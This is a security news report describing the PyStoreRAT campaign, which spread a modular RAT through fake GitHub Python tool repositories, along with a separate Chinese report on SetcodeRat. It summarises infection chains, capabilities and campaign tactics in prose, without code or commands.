Security researchers have identified a campaign that uses GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan (RAT) called PyStoreRAT; a Morphisec researcher, Yonatan Edri, provided details in a report.
The repositories are typically presented as development utilities, OSINT tools, DeFi bots or GPT wrappers but contain only small loader stubs that silently download a remote HTML Application (HTA) file and execute it using mshta.exe, initiating the infection chain.
PyStoreRAT is described as a modular, multi-stage implant able to execute EXE, DLL, PowerShell, MSI, Python, JavaScript and HTA modules and to deploy an information stealer known as Rhadamanthys. The loader profiles the host, checks for administrator privileges, scans for cryptocurrency wallet files associated with Ledger Live, Trezor, Exodus, Atomic, Guarda and BitBox02, and gathers installed antivirus product names to look for strings such as “Falcon” and “Reason” before proceeding with execution.
Persistence is established via a scheduled task disguised as an NVIDIA app self-update and the implant fetches commands from an external server. Supported actions include downloading and executing EXE payloads (including Rhadamanthys), extracting ZIP archives, loading DLLs with rundll32.exe, fetching and evaluating JavaScript in memory, installing MSI packages, spawning secondary mshta.exe processes, executing PowerShell in memory, spreading via removable drives by replacing documents with malicious shortcut files, and deleting the scheduled task to remove traces.
The campaign dates to mid-June 2025 with a steady stream of repositories since then. Threat actors used newly created or long-dormant GitHub accounts and promoted the tools on social media such as YouTube and X, while artificially inflating star and fork metrics to lend credibility. Many repositories provided only static menus or placeholder functionality while malicious maintenance commits in October and November slipped in the loader stubs.
Separately, Chinese security vendor QiAnXin said it has tracked a different RAT called SetcodeRat, likely spread via malvertising since October 2025 and targeting Chinese-speaking regions. That report describes installers that verify system language and a Bilibili URL before proceeding, a sideloading chain that decrypts a DLL from a configuration file, and capabilities that include screenshots, keystroke capture, folder and process access, socket connections and self-updating.